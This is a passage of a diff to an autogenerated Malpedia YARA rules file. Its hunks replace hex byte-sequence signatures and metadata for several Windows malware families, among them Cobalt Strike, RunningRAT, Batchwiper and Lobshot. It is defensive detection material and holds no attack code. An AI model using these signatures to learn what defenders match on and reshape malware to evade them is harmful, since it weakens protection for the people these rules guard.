- $sequence_14 = { 83c9ff c7430c01000000 c7431000000000 eb2f } + $sequence_0 = { 83c120 8d51d0 83fa09 7704 8bca eb10 8d519f } + $sequence_1 = { 6a00 8d542424 52 6a00 ff15???????? 85c0 } + $sequence_2 = { 7422 83e801 7404 83c8ff c3 8b4c2404 b802000000 } + $sequence_3 = { 6a00 8d4c240c 51 52 50 8b442414 50 } + $sequence_4 = { 56 57 33ff 57 6a02 6a02 57 } + $sequence_5 = { 742f 8b0f 6a01 68???????? 68???????? } + $sequence_6 = { 50 8b442414 50 ff15???????? 85c0 7405 } + $sequence_7 = { 6a00 8d942418020000 52 50 } + $sequence_8 = { 3452 e8???????? 0202 0202 1c83 0000 } + $sequence_9 = { 229921688d3c 2ee83e207468 60 238b0d03c783 782e 1463 } + $sequence_10 = { 006c082e 08cc 6969690bc8cc69 690c2e2e0b8ce0 04f7 e10c 206d53 } + $sequence_11 = { 150d14f452 696969697f3cc3 af e2c3 } + $sequence_12 = { 041e 6e 18b8161e6e18 b8161e33c9 0000 16 43 } + $sequence_13 = { 0404 0404 0316 16 } + $sequence_14 = { 0056b0 2e2801 0bd0 83c4ce 00576a 05c705c07f } + $sequence_15 = { 007538 034568 3327 325616 } condition: - 7 of them and filesize <286720 + 7 of them and filesize <270336 } -rule MALPEDIA_Win_Rover_Auto : FILE +rule MALPEDIA_Win_Unidentified_070_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1dedd2f8-89d8-5b82-937e-e4187a543962" + id = "7ae3ca74-0486-51ae-ba4c-20ff0ab01fe5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rover_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_070_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "6367e2cdf56f70609689c8633064a076a7b96ec3143349e9ae15d5e0ca66c168" + logic_hash = "bd634ade531926df7fb9636e5fb1e66cb3297f9900a01fa2493788383a51b75e" score = 75 quality = 75 tags = "FILE" @@ -169159,32 +172017,32 @@ rule MALPEDIA_Win_Rover_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6800120000 885c247b ff15???????? 85c0 0f8422010000 8b35???????? 8d542460 } - $sequence_1 = { ff15???????? 8d4c2404 c684249c00000000 ff15???????? 8d8c24a4000000 c784249c000000ffffffff } - $sequence_2 = { 83ed01 0f8464010000 83ed04 0f845b010000 83bba402000000 8b6a28 896c240c } - $sequence_3 = { 85db 0f856f030000 8b471c 85c0 7421 50 8d442414 } - $sequence_4 = { 8bf0 83c404 3bf3 7537 a1???????? 8b4824 8d542438 } - $sequence_5 = { 50 8b442458 68???????? 50 e8???????? 83c410 85c0 } - $sequence_6 = { 8b8fb0050000 8d6b50 89442410 8987b0050000 8b85a8000000 8bd0 80e215 } - $sequence_7 = { 83e802 7426 83e815 740f 683f270000 ff15???????? 83c8ff } - $sequence_8 = { 83c40c c3 6a2f 57 ffd6 83c408 85c0 } - $sequence_9 = { 57 e8???????? 56 e8???????? 83c40c c744242c04000000 } + $sequence_0 = { 6a04 50 ff15???????? 8945fc 85c0 } + $sequence_1 = { 6a00 6a00 6a04 50 ff15???????? 8945fc 85c0 } + $sequence_2 = { 33c0 c20400 3b0d???????? 7502 } + $sequence_3 = { 6a00 6a04 50 ff15???????? 8945fc } + $sequence_4 = { 6a00 6a04 50 ff15???????? 8945fc 85c0 } + $sequence_5 = { 6a00 6a00 6a00 6a04 50 ff15???????? 8945fc } + $sequence_6 = { 6a00 6a00 6a04 50 ff15???????? 8945fc } + $sequence_7 = { 6a00 8d45f4 50 ff75fc 57 56 } + $sequence_8 = { 8bf9 c78424cc00000000000000 66c78424d00000000010 e8???????? 83c40c 8d442424 50 } + $sequence_9 = { 6a00 56 ff15???????? 8945f8 85c0 0f8493000000 6a00 } condition: - 7 of them and filesize <704512 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Devopt_Auto : FILE +rule MALPEDIA_Win_Rctrl_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b2799a63-9237-56b1-b622-1d4cf3bf7ea8" + id = "60ae096f-d5f7-57d0-b6f9-cb53f8d1b760" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.devopt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.devopt_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rctrl_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "f040e8bf75c02b10fb9ecd2b3e85bb747221bae38ed54254a620b66ea3085268" + logic_hash = "0c64a52ce76fbe6b25b4079783722f9c8bfa120e4543946e41c97eea8cb03d4d" score = 75 quality = 75 tags = "FILE" @@ -169198,32 +172056,32 @@ rule MALPEDIA_Win_Devopt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb42 8b45fc f7402810000000 7402 eb34 8b45fc 80b8a900000000 } - $sequence_1 = { eb11 3b5df0 7e02 eba3 8d7600 c745f0ffffffff 8b45f0 } - $sequence_2 = { eb0b 8b45fc 8b4034 8945d4 eb25 8b45d0 83e00f } - $sequence_3 = { ff9240040000 84c0 7502 eb0b 8b55f8 8b45fc e8???????? } - $sequence_4 = { e8???????? 8b45f4 ba???????? 8955e8 8945ec 8d55e8 31c0 } - $sequence_5 = { 8b4240 8b55f4 8b4a40 8b11 ff5268 8945f0 89d7 } - $sequence_6 = { ff93a8020000 8b45d4 8d40fc 50 8b45d0 8d48fc 8b45f8 } - $sequence_7 = { 8d6424e0 53 8945f4 8955fc 894df8 837dfc00 7e02 } - $sequence_8 = { ff75f0 ff75fc e8???????? 31d2 58 83c40c 648902 } - $sequence_9 = { eb1e 8b45f8 a9ffffffff 7402 eb12 8b45f4 e8???????? } + $sequence_0 = { e8???????? 85c0 0f8440030000 8b10 8bc8 ff520c 83c010 } + $sequence_1 = { 8bf0 56 6a00 6a00 ff15???????? 33c9 894508 } + $sequence_2 = { 6a06 e8???????? cc b8???????? c3 55 8bec } + $sequence_3 = { 8b473c 8985d4feffff e8???????? 85c0 0f85ef000000 814f2400000400 8b85d8feffff } + $sequence_4 = { 33c0 40 8be5 5d c20800 6a14 b8???????? } + $sequence_5 = { 898368040000 03c8 83bd7cffffff00 7433 8b855cffffff 8db328040000 03c1 } + $sequence_6 = { 75cc 8d4dc8 e8???????? e9???????? e8???????? ffb6f8000000 e8???????? } + $sequence_7 = { ff750c 8bd6 e8???????? 8b4518 8d0c3e 8d1400 } + $sequence_8 = { 85c0 0f94c0 84c0 7423 6a00 6a00 57 } + $sequence_9 = { ff7008 ff75f0 e8???????? 8bf0 eb02 } condition: - 7 of them and filesize <4645888 + 7 of them and filesize <4315136 } -rule MALPEDIA_Win_Kgh_Spy_Auto : FILE +rule MALPEDIA_Win_Lightbunny_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "95e1000f-6599-59f6-ad77-7fb1f63fc7e2" + id = "546c8a57-6f91-59bb-b683-389534c380bb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kgh_spy_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightbunny" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lightbunny_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "c99afdfd1b207e301e0a54b515065ba98af784202a9cd5e6f9a55bcba5a38dab" + logic_hash = "4c0608cdc020e5347f646e557ecb414bd8f3027b0aca947da82d4930945e8be1" score = 75 quality = 75 tags = "FILE" @@ -169237,32 +172095,32 @@ rule MALPEDIA_Win_Kgh_Spy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488b442428 8b4c2430 894808 e9???????? 4883c458 5f } - $sequence_1 = { 75e2 488b842498000000 89442460 8b442468 8b4c2460 488b542470 4803d1 } - $sequence_2 = { 488d8c24b0000000 ff15???????? 85c0 0f8547010000 0fb705???????? } - $sequence_3 = { 488d8424300a0000 4889842488000000 48c7442450ffffffff 48ff442450 } - $sequence_4 = { 488b4c2468 803c0800 75e8 488b442468 488d8c24c0000000 48898c2498000000 48c7442470ffffffff } - $sequence_5 = { f3aa 488d4c2428 ff15???????? 0fb7442428 83f809 740a 0fb7442428 } - $sequence_6 = { 488d8424f0030000 488bf8 33c0 b908020000 f3aa 4c8d0df7e30000 } - $sequence_7 = { 4885c0 7403 f0ff00 488d4128 41b806000000 488d15b4a30000 483950f0 } - $sequence_8 = { 8bc8 e8???????? 48898424d8000000 48c744242000000000 4c8d8c2470010000 448b442468 } - $sequence_9 = { 488d1dddab0000 483bcb 740c e8???????? } + $sequence_0 = { 6bc930 8b048520ae4100 0fb6440828 83e040 5d } + $sequence_1 = { 8bc1 83e13f c1f806 6bc930 8b048520ae4100 f644082801 } + $sequence_2 = { 83c404 6a02 ff35???????? ffd3 } + $sequence_3 = { 894708 0fb74602 50 ff15???????? } + $sequence_4 = { ff35???????? ff15???????? c705????????00000000 8b4dfc } + $sequence_5 = { 51 ff15???????? 85c0 740e 8b400c 8b00 } + $sequence_6 = { 8d3c9d58ab4100 f00fb10f 8bc8 85c9 740b } + $sequence_7 = { 83c404 83f801 0f851dffffff 8b5710 33c9 b8???????? 90 } + $sequence_8 = { 6bc030 c1f906 03048d20ae4100 eb02 8bc6 80782900 7522 } + $sequence_9 = { 8b75f8 33ff 8b0d???????? 8bc6 8945e4 894de8 } condition: - 7 of them and filesize <207872 + 7 of them and filesize <2376704 } -rule MALPEDIA_Win_Atlas_Agent_Auto : FILE +rule MALPEDIA_Win_Rcs_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "31d9d19b-f3ba-501d-964d-67da428e9e82" + id = "897f58a2-dc22-5f97-b551-4f423c0a43b4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atlas_agent" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atlas_agent_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rcs_auto.yar#L1-L180" license_url = "N/A" - logic_hash = "49564f12d410922863a80d6084c9c71952a7f941729a00c4d7e4e12f95d889bc" + logic_hash = "6868fef137d3b17f3a70ffb34345814aa00441ab2e72c702d2e7f970155b6f03" score = 75 quality = 75 tags = "FILE" @@ -169276,36 +172134,40 @@ rule MALPEDIA_Win_Atlas_Agent_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb60c0a 83e13c c1f902 03c1 } - $sequence_1 = { 8bc1 99 b903000000 f7f9 c1e002 } - $sequence_2 = { 4c8b8424c8000000 488b9424c0000000 488b8c2480000000 e8???????? 89442460 } - $sequence_3 = { 4c8b8424e0000000 488b9424d8000000 488b4c2468 e8???????? } - $sequence_4 = { 89857cffffff c645fc06 83bd7cffffff00 7417 } - $sequence_5 = { 898584feffff 8b8584feffff 50 8d8dd4feffff } - $sequence_6 = { 898588f8ffff 8b9588f8ffff 899584f8ffff c645fc07 } - $sequence_7 = { 4c8b8424f0000000 488b942488000000 488b8c24e0000000 e8???????? } - $sequence_8 = { 89857cffffff 83bd7cffffff1e 7302 eb05 } - $sequence_9 = { 4c8b8424f8000000 488b942400010000 488d8c24f0030000 e8???????? } - $sequence_10 = { 89857cffffff 8b8d18ffffff 894d80 83bd7cffffff00 } - $sequence_11 = { 4c8b8c2408010000 4c8d05c2930400 ba40000000 488d4c2470 } - $sequence_12 = { 89857cffffff 895580 8b4580 3b45dc } - $sequence_13 = { 4c8b8c2408010000 4c8d442460 488b9424f8000000 488b8c24f0000000 } + $sequence_0 = { 6a00 6880000000 6a01 6a00 6a05 } + $sequence_1 = { 8944245e 89442462 89442466 8944246a } + $sequence_2 = { 85ff 0f84d4000000 57 e8???????? } + $sequence_3 = { e8???????? 83c430 6aff 68???????? } + $sequence_4 = { ff15???????? 5f 5e 5d 5b 33c0 } + $sequence_5 = { 40 68???????? 50 e8???????? 83c40c eb0d } + $sequence_6 = { 81f1f3221c6a 41 f7c7073ed86f f8 f9 } + $sequence_7 = { 742d 8b7d08 8bbfdc000000 b81c010000 f765fc 8985c0feffff } + $sequence_8 = { 81f1ff2fe523 80f973 66f7c5db7a f5 } + $sequence_9 = { 83f907 773d ff248d6872f301 4f } + $sequence_10 = { 8945f4 eb1c 8b86dc000000 8b9014120000 0fb7781c c1e704 8b3c17 } + $sequence_11 = { 83f906 775c ff248d602ef001 c705????????803e0000 } + $sequence_12 = { 6a0e 6a00 ff75dc e8???????? 83c40c } + $sequence_13 = { 0fb7b810120000 c1e704 8b8d48f4fbff 83c103 0fb78c8870020000 c1e104 8b0c11 } + $sequence_14 = { 8b37 81c6c8020000 56 ff75fc ff5704 } + $sequence_15 = { 8b75ec 0375f8 8b5e0c 39df 7235 035e08 } + $sequence_16 = { 8bbfdc000000 8b7730 897734 ff7518 } + $sequence_17 = { 8b55fc 8b45f8 52 50 8b7d08 ff97a0000000 } condition: - 7 of them and filesize <857088 + 7 of them and filesize <11501568 } -rule MALPEDIA_Win_Unidentified_003_Auto : FILE +rule MALPEDIA_Win_Ramdo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "078af5cf-1960-57c1-ad2f-834d23801cf0" + id = "5b8e6fef-0e3b-5ed2-888f-7434293b69d6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_003_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ramdo_auto.yar#L1-L104" license_url = "N/A" - logic_hash = "44e97183e244c5496d21c90ef879a2c3ae0327847947e2b5ee30ab46305a46ce" + logic_hash = "915394834672872c9dd5e507ba31a9e70d058b5fc9e0d5522912234c2f6ee339" score = 75 quality = 75 tags = "FILE" @@ -169319,32 +172181,32 @@ rule MALPEDIA_Win_Unidentified_003_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945ec a1???????? 0fb7506f 0fb7406d c1e210 0bd0 } - $sequence_1 = { c68564ffffff01 33c0 8a88c2100900 888c0566ffffff 40 } - $sequence_2 = { e8???????? 83c40c 8b07 5d c3 55 8bec } - $sequence_3 = { a1???????? ff75f0 ff7028 ff15???????? eb0a } - $sequence_4 = { 395da0 740f ff75a4 ff15???????? 895da0 } - $sequence_5 = { 3bfe 7502 8bfb 39742410 } - $sequence_6 = { 59 85c0 7417 47 81c614010000 3b3d???????? 72c8 } - $sequence_7 = { 8bec 81ec20080000 53 56 57 8d85e0fdffff 8945ec } - $sequence_8 = { 7575 385d6e 743b 39bd5cffffff 750a c705????????07000000 399d5cffffff } - $sequence_9 = { ff15???????? 85c0 0f88b4010000 8b45e4 3bc3 0f84a9010000 8b08 } + $sequence_0 = { 6813299e13 6a00 6a00 e8???????? } + $sequence_1 = { ff55f8 8945fc 837dfcff 7411 } + $sequence_2 = { 688fe57c18 6a03 6a00 e8???????? } + $sequence_3 = { 681186933f 6a03 6a00 e8???????? } + $sequence_4 = { 68b20cdc96 6a03 6a00 e8???????? } + $sequence_5 = { 6a00 6a00 ff95dcfeffff 8945fc } + $sequence_6 = { e8???????? 3db7000000 7405 8b45fc } + $sequence_7 = { 681b313f7d 6a03 6a00 e8???????? } + $sequence_8 = { 68e9b528b6 6a03 6a00 e8???????? } + $sequence_9 = { 68c29e34ea 6a03 6a00 e8???????? } condition: - 7 of them and filesize <57344 + 7 of them and filesize <548864 } -rule MALPEDIA_Win_Runningrat_Auto : FILE +rule MALPEDIA_Win_Batchwiper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dfc93b52-63e2-55d7-a28a-ac61edd067cb" + id = "cb044b8c-027b-5368-bd79-45da5d915947" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.runningrat_auto.yar#L1-L161" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.batchwiper_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "93ccf5e13fdb9515ec5cdc43025f3b9796a39f81cb6409c0f2fa39eb59211d22" + logic_hash = "14983b1d6532d433e6ad6924f17da812f5983b6eabd0fde8fd8892a9d3b6fb0b" score = 75 quality = 75 tags = "FILE" @@ -169358,37 +172220,32 @@ rule MALPEDIA_Win_Runningrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 56 ff15???????? 8b8c2418010000 } - $sequence_1 = { 8b4904 56 8b742410 56 8d542414 50 } - $sequence_2 = { 85c0 7404 50 ff5650 8b5660 } - $sequence_3 = { 8988100b0000 8d88740a0000 8988280b0000 33c9 c780180b000080cd0110 89901c0b0000 c780240b000098cd0110 } - $sequence_4 = { 894554 89542428 b910000000 33c0 8d7c2438 } - $sequence_5 = { 8d442440 c1e902 f3a5 8bca 50 83e103 } - $sequence_6 = { 5d 33c0 5b 81c4f8020000 c20400 8b35???????? 6800000100 } - $sequence_7 = { c7462400000000 83c610 6a00 56 ff15???????? 5e } - $sequence_8 = { 7cd9 8bf2 8b8e80000000 b8cdcccccc f7a684000000 c1ea04 } - $sequence_9 = { 83c404 395630 740d 8b542418 } - $sequence_10 = { 8d942410010000 52 6a00 6a00 } - $sequence_11 = { 8d842432020000 6a00 50 c684242c02000046 } - $sequence_12 = { 83ea01 898c3c90000000 75ed 8bd3 33ff 8d4900 } - $sequence_13 = { 8b742424 e9???????? 6803010000 8d442431 6a00 50 } - $sequence_14 = { 33c0 e8???????? 81c468040000 c3 3b0d???????? 7502 } + $sequence_0 = { 83c001 8bce c1e908 330c9de8904000 } + $sequence_1 = { 8b0424 894510 8b442408 894514 8b442404 } + $sequence_2 = { 8b442408 894514 8b442404 894518 8d44240c } + $sequence_3 = { e8???????? 50 31db 3b1c24 756b } + $sequence_4 = { 89d8 e8???????? 89c3 83fb01 7531 ff35???????? } + $sequence_5 = { 83fb01 7531 ff35???????? ba???????? e8???????? 8b15???????? e8???????? } + $sequence_6 = { e8???????? 89c3 83fb01 7531 ff35???????? ba???????? } + $sequence_7 = { e8???????? 8d0d28b14000 5a e8???????? 8b15???????? ff35???????? e8???????? } + $sequence_8 = { ba???????? e8???????? 8d0d28b14000 5a e8???????? 8b15???????? ff35???????? } + $sequence_9 = { c705????????02000000 893d???????? c705????????dd424000 c705????????80464000 c705????????da464000 c705????????00474000 } condition: - 7 of them and filesize <278528 + 7 of them and filesize <270336 } -rule MALPEDIA_Win_Lunchmoney_Auto : FILE +rule MALPEDIA_Win_Http_Troy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8af393b3-e0ee-5b29-9ae9-6b5b0b5bb360" + id = "e1b34482-29c1-5d78-b5ec-9dc58faf8306" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lunchmoney_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.http_troy_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "4e3c0ce49996288518b2f9a0e709877b3f945a71128e29da2214bd53e19246e9" + logic_hash = "772a93ccc4b452bdc4c7e0291c378f7eec15f191b5f119cfc79098a0f26a733e" score = 75 quality = 75 tags = "FILE" @@ -169402,32 +172259,32 @@ rule MALPEDIA_Win_Lunchmoney_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4304 8d4b0c 83791408 8945dc 8b4308 8945e0 7202 } - $sequence_1 = { 7405 e8???????? a900000080 751f d9fa 833d????????00 0f85f38b0000 } - $sequence_2 = { c1e60a 56 e8???????? 56 8bf8 6a00 57 } - $sequence_3 = { 53 8d4d08 e8???????? 83f8ff 750e 68???????? } - $sequence_4 = { 8d4dd4 e8???????? 83f8ff 742d 6aff 40 } - $sequence_5 = { 7420 53 8d85dcfeffff 50 } - $sequence_6 = { ff7580 e8???????? 8b8568ffffff 014588 59 83957cffffff00 837d0800 } - $sequence_7 = { 8bcf e8???????? 837f1408 8bc8 } - $sequence_8 = { 8bc3 e8???????? c3 53 56 8bf1 57 } - $sequence_9 = { 8d86f8000000 83c124 3bc8 740a 6aff 6a00 50 } + $sequence_0 = { dd45f8 dae9 59 59 dfe0 f6c444 7a05 } + $sequence_1 = { c3 8b8384400000 85c0 0f84bd010000 8b54240c 52 8b542414 } + $sequence_2 = { ff00 85d2 744e 8d45ec 50 53 8bcf } + $sequence_3 = { 8b4c2420 b801000000 89410c 8b4c2418 5f 5e e8???????? } + $sequence_4 = { 56 57 e8???????? 59 59 eb7d dd4508 } + $sequence_5 = { 83c604 3b742408 72ef 5e c3 56 8bf0 } + $sequence_6 = { 6a01 68???????? ffd3 85c0 0f857afeffff 393cb5c8540310 742e } + $sequence_7 = { 50 8d4c240c 51 6a00 683f000f00 6a00 } + $sequence_8 = { e8???????? 8b0d???????? 83c408 3bc1 741f 83c702 } + $sequence_9 = { e8???????? 83c41c 8d942418010000 52 ffd3 85c0 7430 } condition: - 7 of them and filesize <373760 + 7 of them and filesize <475136 } -rule MALPEDIA_Win_Cobalt_Strike_Auto : FILE +rule MALPEDIA_Win_Lobshot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fe16365e-18f7-5cb3-91e7-4778fbcc5b82" + id = "5bc103fe-8569-5650-9cd3-425031e0ab5f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cobalt_strike_auto.yar#L1-L157" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lobshot_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "e575d34f1fe7007aa1601e291288f1136cef68df0b3f455e03eabc3d825e94fe" + logic_hash = "b29ec78bd5106a9ad51352916c3857459a77fea2349f02317d142c1882771dfc" score = 75 quality = 75 tags = "FILE" @@ -169441,40 +172298,34 @@ rule MALPEDIA_Win_Cobalt_Strike_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3bc7 750d ff15???????? 3d33270000 } - $sequence_1 = { e9???????? eb0a b801000000 e9???????? } - $sequence_2 = { eb06 0fb6c0 83e07f 85c0 745a } - $sequence_3 = { eb68 8b45d4 8b482c 894de0 8b45e0 } - $sequence_4 = { ff35???????? ffd6 5e e9???????? 55 } - $sequence_5 = { eb4e 83f824 7f09 c745f403000000 } - $sequence_6 = { ff761c 83c004 e8???????? 59 59 83f8ff } - $sequence_7 = { f3a6 744c 8bf0 6a03 bf???????? 59 } - $sequence_8 = { 85c0 741d ff15???????? 85c0 7513 } - $sequence_9 = { e9???????? 833d????????01 7505 e8???????? } - $sequence_10 = { 8bd0 e8???????? 85c0 7e0e } - $sequence_11 = { 85c0 7405 e8???????? 8b0d???????? 85c9 } - $sequence_12 = { f3c3 cc 488bc4 48895808 48896810 48897018 } - $sequence_13 = { c1e903 ffc1 03c1 3d80000000 } - $sequence_14 = { 49ffc7 413bcc 72e9 41894d00 } - $sequence_15 = { 48895c2448 48895c2440 4889442438 498b06 } + $sequence_0 = { 895c2414 85f6 7410 6a02 56 ff15???????? 56 } + $sequence_1 = { 8b4508 8bd1 85c0 7409 c60200 42 } + $sequence_2 = { 728d ff742418 ff15???????? 8b74241c 43 83fb04 0f8e42ffffff } + $sequence_3 = { 85d2 7905 895e18 8bd3 57 6a2a } + $sequence_4 = { 0f8485000000 8b461c 85c0 747e 8b7804 83ff2a 740d } + $sequence_5 = { 0f42c8 33ff 894d08 47 8b4e6c 3bcf 771f } + $sequence_6 = { 8b55f8 33ff 85d2 7839 8b5dfc 0fb774bb02 85f6 } + $sequence_7 = { 8b4e08 8a86b1160000 88040a ff4614 0fb786b4160000 8386b4160000f3 } + $sequence_8 = { 53 ff15???????? 8b0d???????? 8b15???????? 2b15???????? 8d4102 83e902 } + $sequence_9 = { 895004 8b8348140000 99 2bc2 8bf0 d1fe } condition: - 7 of them and filesize <1015808 + 7 of them and filesize <247808 } -rule MALPEDIA_Win_Magic_Rat_Auto : FILE +rule MALPEDIA_Win_Vermilion_Strike_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fef12775-f5d4-5648-9916-cb915f91f28b" + id = "cba78739-b046-53e4-ac8a-fb7e1edf89cf" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.magic_rat_auto.yar#L1-L111" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermilion_strike" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vermilion_strike_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "d23de63f3611a6306ebe3970ddd7285c351120d5c12dbd45ba2d1d594ef068a3" - score = 60 - quality = 45 + logic_hash = "1312a531701a8eef40faaee34110290f7221a3999f3d5685ddec7e08b4b4a11d" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -169486,32 +172337,32 @@ rule MALPEDIA_Win_Magic_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7407 3dffff0000 756f } - $sequence_1 = { f20f2ac9 f20f5cc1 f20f58c3 f20f2cc0 } - $sequence_2 = { 0f84b8000000 83faff 7408 f0830001 } - $sequence_3 = { 660f2ec2 7308 660f5705???????? 660f2ee2 f20f59c5 7308 660f5725???????? } - $sequence_4 = { 29c2 89d0 c1f80e f7d8 eb08 } - $sequence_5 = { 8b01 81e20080ffff 25ff7f0000 09d0 } - $sequence_6 = { 8b4500 85c0 0f8472010000 83f8ff 740b f0836d0001 } - $sequence_7 = { f20f58c3 f20f2cd0 01ca e9???????? } - $sequence_8 = { 85d2 740b 83faff 74ad f0832801 } - $sequence_9 = { 81fa???????? 7442 81fa???????? 744a } + $sequence_0 = { 0f8e3f010000 56 55 8d442444 e8???????? 85ff 751b } + $sequence_1 = { ff15???????? 8bf7 e8???????? 8b15???????? 6a00 6a01 } + $sequence_2 = { 51 8d4601 e8???????? 6a30 53 8bc6 8d7c2444 } + $sequence_3 = { 8bd8 8beb 897c2418 85c0 7517 e8???????? 33c0 } + $sequence_4 = { 6a00 6a00 6a03 6a00 6a00 50 53 } + $sequence_5 = { 83c8ff 8bf7 c744244802000000 e8???????? 885c2440 396c2428 720d } + $sequence_6 = { 83c004 395e18 7205 8b7604 eb03 83c604 8b3d???????? } + $sequence_7 = { 8bc1 57 c746180f000000 c7461400000000 c744240400000000 c6460400 } + $sequence_8 = { 6a02 8bc3 7413 68???????? e8???????? 6a02 68???????? } + $sequence_9 = { 3bc5 7405 e8???????? 2bdf 8b542424 52 } condition: - 7 of them and filesize <41843712 + 7 of them and filesize <540672 } -rule MALPEDIA_Win_Kronos_Auto : FILE +rule MALPEDIA_Win_Pslogger_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8d31fd16-d4f2-5a2a-96ec-ac39493ba957" + id = "15c6e79e-2171-5604-b7eb-21f0a1c9eae7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos" - source_url = 